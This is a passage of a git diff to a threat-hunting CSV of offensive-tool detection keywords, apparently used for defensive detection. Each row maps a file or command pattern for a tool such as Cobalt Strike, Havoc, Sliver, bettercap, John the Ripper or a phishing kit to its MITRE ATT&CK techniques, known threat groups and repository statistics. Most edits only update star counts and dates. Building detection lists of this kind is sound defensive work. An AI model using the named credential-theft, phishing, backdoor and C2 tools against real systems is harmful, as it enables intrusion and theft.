Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" -"*best*phish her*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","0","N/A","N/A","9","831","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" -"*bestcrypt2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*bestcryptve2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*best*phish her*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","0","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*bestcrypt2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*bestcryptve2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*BetterBackdoor*","offensive_tool_keyword","BetterBackdoor","A backdoor is a tool used to gain remote access to a machine.","T1071 - T1055 - T1059 - T1053","TA0002 - TA0006 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/thatcherclough/BetterBackdoor","1","1","N/A","N/A","3","275","89","2022-10-03T21:30:21Z","2019-07-29T14:45:24Z" -"*bettercap *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*bettercap *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "*bettercap -iface eth0*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*bettercap.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*bettercap_.deb*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*bettercap-master.zip*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*bettercap.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*bettercap_.deb*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*bettercap-master.zip*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "*betterdefaultpasslist*","offensive_tool_keyword","betterdefaultpasslist","list includes default credentials from various manufacturers for their products like NAS. ERP. ICS etc.. that are used for standard products like mssql. vnc. oracle and so on useful for network bruteforcing","T1110 - T1111 - T1112 - T1113 - T1114 - T1115 - T1116 - T1117 - T1118 - T1119","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/govolution/betterdefaultpasslist","1","1","N/A","N/A","6","585","151","2021-03-11T11:32:17Z","2016-09-24T16:21:44Z" -"*BetterSafetyKatz.*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*BetterSafetyKatz.*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*bgetprivs*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bhashdump*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*bhd_enum_dconly*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*bhd_enum_dconly*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*bhttp_x64.dll*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bHVrZXJlYWxseWlzdGhlbWFubXl0aGFuZGxlZ2VuZA*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*bigb0sss/goPassGen*","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tools","https://github.com/bigb0sss/goPassGen","1","1","N/A","8","1","20","3","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z" "*bin/*/PS2EXE/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*bin/addusertogroup.x64*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*bin/addusertogroup.x64*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*bin/bof_c.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","83","12","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" "*bin/bof_nim.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","83","12","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" "*bin/dll/merlin.c*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" @@ -7777,9 +7923,9 @@ "*bin/ldd2pretty*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" "*bin/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*bin/localrelay*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" -"*bin/masscan*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21683","2981","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" -"*bin/setoolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","1","N/A","N/A","10","9394","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" -"*bin/setuserpass.x64*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*bin/masscan*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*bin/setoolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","1","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"*bin/setuserpass.x64*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*bin/SillyRAT/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*bin/striker*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*bin/void.zip*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" @@ -7789,33 +7935,34 @@ "*bin\void.zip*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*binderlabs/DirCreate2System*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*binwalk -e image.png*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*BishopFox/sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*bitb_server/phishing.ini*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2645","463","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" -"*bitcoin2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Bitmap-Elevate*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*BishopFox/sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*bitb_server/phishing.ini*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" +"*bitcoin2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Bitmap-Elevate*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - 